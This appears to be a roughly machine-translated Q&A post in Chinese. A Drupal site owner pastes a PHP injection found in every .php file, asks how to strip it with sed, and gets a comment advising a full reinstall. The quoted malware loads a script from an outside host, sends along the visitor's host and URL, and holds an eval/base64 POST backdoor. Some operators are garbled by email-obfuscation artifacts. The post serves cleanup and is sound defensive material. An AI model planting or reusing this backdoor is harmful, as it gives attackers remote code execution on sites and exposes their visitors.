我被運行一個非常過時的Drupal安裝(可恥的是我)sed的,取代第一線
他們似乎注入每.php
文件中的以下砍死;
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if([email protected]$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if([email protected]_sent()) { @setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
}
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
sessdt_j = @$_SERVER["HTTP_HOST"][email protected]$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
我可以刪除並用sed
替換它嗎?例如:
find . -name *.php | xargs ...
我希望網站能夠暫時使用wget並創建一個靜態副本。
我想這是一個有點晚,但對於任何可能處於相同情況的人員:切勿嘗試修復被黑客入侵的系統。唯一的解決方案是從頭重新安裝,只複製手動驗證的配置文件和數據庫轉儲。 – Dunatotatos 2017-02-22 07:44:30